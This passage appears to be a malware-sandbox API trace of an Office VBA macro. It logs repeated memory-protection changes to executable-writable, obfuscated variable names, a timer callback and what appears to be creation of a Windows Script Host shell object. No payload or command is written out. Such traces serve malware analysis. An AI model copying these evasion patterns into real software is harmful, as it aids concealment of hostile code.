(in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.448] GetCurrentProcess () returned 0xffffffff [0101.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0101.448] GetCurrentProcess () returned 0xffffffff [0101.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0101.451] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.451] GetCurrentProcess () returned 0xffffffff [0101.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0101.453] GetCurrentProcess () returned 0xffffffff [0101.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0101.453] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.455] GetCurrentProcess () returned 0xffffffff [0101.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0101.455] GetCurrentProcess () returned 0xffffffff [0101.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0101.455] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.456] GetCurrentProcess () returned 0xffffffff [0101.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0101.456] GetCurrentProcess () returned 0xffffffff [0101.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0101.456] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.458] GetCurrentProcess () returned 0xffffffff [0101.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0101.458] GetCurrentProcess () returned 0xffffffff [0101.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0101.459] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.459] GetCurrentProcess () returned 0xffffffff [0101.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0101.459] GetCurrentProcess () returned 0xffffffff [0101.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0101.461] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.462] GetCurrentProcess () returned 0xffffffff [0101.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0101.462] GetCurrentProcess () returned 0xffffffff [0101.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0101.462] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.463] GetCurrentProcess () returned 0xffffffff [0101.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0101.463] GetCurrentProcess () returned 0xffffffff [0101.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0101.463] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.466] GetCurrentProcess () returned 0xffffffff [0101.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0101.466] GetCurrentProcess () returned 0xffffffff [0101.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0101.466] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.466] GetCurrentProcess () returned 0xffffffff [0101.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0101.466] GetCurrentProcess () returned 0xffffffff [0101.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0101.467] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.467] GetCurrentProcess () returned 0xffffffff [0101.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0101.467] GetCurrentProcess () returned 0xffffffff [0101.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0101.467] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.468] GetCurrentProcess () returned 0xffffffff [0101.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0101.468] GetCurrentProcess () returned 0xffffffff [0101.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0101.468] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.469] GetCurrentProcess () returned 0xffffffff [0101.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0101.469] GetCurrentProcess () returned 0xffffffff [0101.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0101.470] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.471] GetCurrentProcess () returned 0xffffffff [0101.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0101.471] GetCurrentProcess () returned 0xffffffff [0101.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0101.471] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.473] GetCurrentProcess () returned 0xffffffff [0101.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0101.473] GetCurrentProcess () returned 0xffffffff [0101.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0101.473] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.474] GetCurrentProcess () returned 0xffffffff [0101.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0101.474] GetCurrentProcess () returned 0xffffffff [0101.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0101.474] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.476] GetCurrentProcess () returned 0xffffffff [0101.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0101.476] GetCurrentProcess () returned 0xffffffff [0101.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0101.476] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.478] GetCurrentProcess () returned 0xffffffff [0101.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0101.478] GetCurrentProcess () returned 0xffffffff [0101.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0101.478] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.479] GetCurrentProcess () returned 0xffffffff [0101.479] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0101.479] GetCurrentProcess () returned 0xffffffff [0101.479] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0101.479] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.480] GetCurrentProcess () returned 0xffffffff [0101.480] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0101.480] GetCurrentProcess () returned 0xffffffff [0101.480] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0101.480] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.481] GetCurrentProcess () returned 0xffffffff [0101.481] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0101.481] GetCurrentProcess () returned 0xffffffff [0101.481] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0101.481] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.483] GetCurrentProcess () returned 0xffffffff [0101.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0101.483] GetCurrentProcess () returned 0xffffffff [0101.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0101.483] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.485] GetCurrentProcess () returned 0xffffffff [0101.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0101.485] GetCurrentProcess () returned 0xffffffff [0101.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0101.485] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.486] GetCurrentProcess () returned 0xffffffff [0101.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0101.486] GetCurrentProcess () returned 0xffffffff [0101.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0101.486] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.497] GetCurrentProcess () returned 0xffffffff [0101.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0101.497] GetCurrentProcess () returned 0xffffffff [0101.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0101.497] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.498] GetCurrentProcess () returned 0xffffffff [0101.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0101.498] GetCurrentProcess () returned 0xffffffff [0101.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0101.498] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0101.499] GetCurrentProcess () returned 0xffffffff [0101.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0101.499] SetErrorMode (uMode=0x8001) returned 0x8001 [0101.499] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0101.499] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0101.500] SetErrorMode (uMode=0x8001) returned 0x8001 [0101.501] GetProcAddress (hModule=0x693e0000, lpProcName=0x272) returned 0x695d533a [0101.502] GetAsyncKeyState (vKey=3) returned 0 [0101.502] GetAsyncKeyState (vKey=3) returned 0 [0101.502] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.502] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.502] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.502] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.502] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0101.502] CreateBindCtx (in: reserved=0x0, ppbc=0x1977f8 | out: ppbc=0x1977f8*=0xf4b1be0) returned 0x0 [0101.503] MkParseDisplayName (in: pbc=0xf4b1be0, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x1977fc, ppmk=0x197800 | out: pchEaten=0x1977fc, ppmk=0x197800*=0xf4b1aa0) returned 0x0 [0102.994] IUnknown:Release (This=0xf4b1be0) returned 0x0 [0102.995] BindMoniker (in: pmk=0xf4b1aa0, grfOpt=0x0, iidResult=0x695f8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x1977f4 | out: ppvResult=0x1977f4*=0x8cecde4) returned 0x0 [0104.445] IUnknown:Release (This=0xf4b1aa0) returned 0x0 [0104.445] GetAsyncKeyState (vKey=3) returned 0 [0104.450] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197b9c | out: ppsaOut=0x197b9c) returned 0x0 [0104.450] SafeArrayAllocData (psa=0xc98ba40) returned 0x0 [0104.460] SafeArrayDestroyData (psa=0xc98ba40) returned 0x0 [0104.460] SafeArrayDestroyDescriptor (psa=0xc98ba40) returned 0x0 [0104.466] SetErrorMode (uMode=0x8001) returned 0x8001 [0104.466] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0104.466] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0104.467] SetErrorMode (uMode=0x8001) returned 0x8001 [0104.468] GetProcAddress (hModule=0x743d0000, lpProcName="SetTimer") returned 0x743eee50 [0104.468] SetTimer (hWnd=0x0, nIDEvent=0x9d44020, uElapse=0x1, lpTimerFunc=0x9d44020) returned 0x7f7b [0104.468] GetLastError () returned 0x0 [0104.468] CRetailMalloc_Alloc () returned 0x6305c8 [0104.468] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.469] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.469] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x96\x97", cchCount2=-1) returned 1 [0104.469] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x96\x97", cchCount2=-1) returned 3 [0104.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82f4e, cbMultiByte=8, lpWideCharStr=0x1976c4, cchWideChar=9 | out: lpWideCharStr="––––—–—") returned 8 [0104.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40362, cbMultiByte=8, lpWideCharStr=0x197724, cchWideChar=9 | out: lpWideCharStr="––––—–—") returned 8 [0104.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40362, cbMultiByte=8, lpWideCharStr=0x197724, cchWideChar=9 | out: lpWideCharStr="––––—–—") returned 8 [0104.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40362, cbMultiByte=8, lpWideCharStr=0x197724, cchWideChar=9 | out: lpWideCharStr="––––—–—") returned 8 [0104.470] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x96\x97", cchCount2=-1) returned 1 [0104.470] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x96\x97", cchCount2=-1) returned 3 [0104.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40362, cbMultiByte=8, lpWideCharStr=0x197724, cchWideChar=9 | out: lpWideCharStr="––––—–—") returned 8 [0104.470] CRetailMalloc_Alloc () returned 0xf4a26a0 [0104.470] _mbscpy_s (in: _Dst=0xf4a26a0, _DstSizeInBytes=0x8, _Src=0x9a40362 | out: _Dst=0xf4a26a0) returned 0x0 [0104.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40cee, cbMultiByte=15, lpWideCharStr=0x197734, cchWideChar=16 | out: lpWideCharStr="_B_var_––––—–—") returned 15 [0104.471] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x8, _Src=0x9a40362 | out: _Dst=0x19779c) returned 0x0 [0104.471] CRetailMalloc_Free () returned 0x1 [0104.471] memcpy (in: _Dst=0xb2a516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0104.471] memcpy (in: _Dst=0xb2a516c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0104.471] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.471] memcpy (in: _Dst=0xb2a5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0104.471] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.471] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a80922, cbMultiByte=9, lpWideCharStr=0x1976c4, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0104.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11300922, cbMultiByte=9, lpWideCharStr=0x197724, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0104.472] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.472] memcpy (in: _Dst=0xb2a516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0104.472] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0104.472] memcpy (in: _Dst=0x630630, _Src=0x197944, _Size=0x18 | out: _Dst=0x630630) returned 0x630630 [0104.472] CRetailMalloc_Realloc () returned 0x6305c8 [0104.473] CRetailMalloc_Free () returned 0x1 [0104.473] GetCurrentProcess () returned 0xffffffff [0104.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0104.473] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.474] GetCurrentProcess () returned 0xffffffff [0104.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0104.474] GetCurrentProcess () returned 0xffffffff [0104.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0104.474] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.474] GetCurrentProcess () returned 0xffffffff [0104.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0104.474] GetCurrentProcess () returned 0xffffffff [0104.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0104.474] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.475] GetCurrentProcess () returned 0xffffffff [0104.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0104.475] GetCurrentProcess () returned 0xffffffff [0104.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0104.475] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.476] GetCurrentProcess () returned 0xffffffff [0104.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0104.476] GetCurrentProcess () returned 0xffffffff [0104.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0104.476] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.477] GetCurrentProcess () returned 0xffffffff [0104.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0104.477] GetCurrentProcess () returned 0xffffffff [0104.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0104.477] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.477] GetCurrentProcess () returned 0xffffffff [0104.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0104.478] GetCurrentProcess () returned 0xffffffff [0104.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0104.478] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.478] GetCurrentProcess () returned 0xffffffff [0104.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0104.478] GetCurrentProcess () returned 0xffffffff [0104.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0104.478] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.528] GetCurrentProcess () returned 0xffffffff [0104.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0104.528] GetCurrentProcess () returned 0xffffffff [0104.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0104.528] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.529] GetCurrentProcess () returned 0xffffffff [0104.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0104.529] GetCurrentProcess () returned 0xffffffff [0104.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0104.529] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.530] GetCurrentProcess () returned 0xffffffff [0104.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0104.530] GetCurrentProcess () returned 0xffffffff [0104.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0104.530] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.531] GetCurrentProcess () returned 0xffffffff [0104.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0104.531] GetCurrentProcess () returned 0xffffffff [0104.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0104.531] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.531] GetCurrentProcess () returned 0xffffffff [0104.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0104.531] GetCurrentProcess () returned 0xffffffff [0104.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0104.531] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.532] GetCurrentProcess () returned 0xffffffff [0104.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0104.532] GetCurrentProcess () returned 0xffffffff [0104.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0104.532] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.533] GetCurrentProcess () returned 0xffffffff [0104.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0104.533] GetCurrentProcess () returned 0xffffffff [0104.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0104.533] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: 